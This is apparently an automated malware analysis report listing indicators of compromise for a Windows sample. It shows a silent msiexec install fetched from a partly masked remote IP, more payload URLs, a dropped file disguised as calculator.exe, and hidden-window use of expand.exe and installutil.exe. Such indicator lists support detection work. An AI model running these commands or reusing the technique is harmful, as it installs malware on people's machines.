Technical Information
- '<SYSTEM32>\msiexec.exe' /i http://66.##6.40.103/file.msi /qn
- %WINDIR%\microsoft.net\framework\v4.0.30319\installutil.exe
- %TEMP%\mw-d6b64d8f-6b76-434e-983c-9f50ca50fc44\msiwrapper.ini
- %TEMP%\mw-d6b64d8f-6b76-434e-983c-9f50ca50fc44\files.cab
- %TEMP%\mw-d6b64d8f-6b76-434e-983c-9f50ca50fc44\files\$dpx$.tmp\a7b5dbb12e673745abe81d08e16db3bf.tmp
- from %TEMP%\mw-d6b64d8f-6b76-434e-983c-9f50ca50fc44\files\$dpx$.tmp\a7b5dbb12e673745abe81d08e16db3bf.tmp to %TEMP%\mw-d6b64d8f-6b76-434e-983c-9f50ca50fc44\files\calculator.exe
- http://66.##6.40.103/file.msi
- http://66.##6.40.103/bin.bin
- http://66.##6.40.103/info.php
- DNS ASK sp###.network
- '%TEMP%\mw-d6b64d8f-6b76-434e-983c-9f50ca50fc44\files\calculator.exe'
- '%WINDIR%\syswow64\expand.exe' -R files.cab -F:* files' (with hidden window)
- '%WINDIR%\syswow64\expand.exe' -R files.cab -F:* files
- '%WINDIR%\microsoft.net\framework\v4.0.30319\installutil.exe'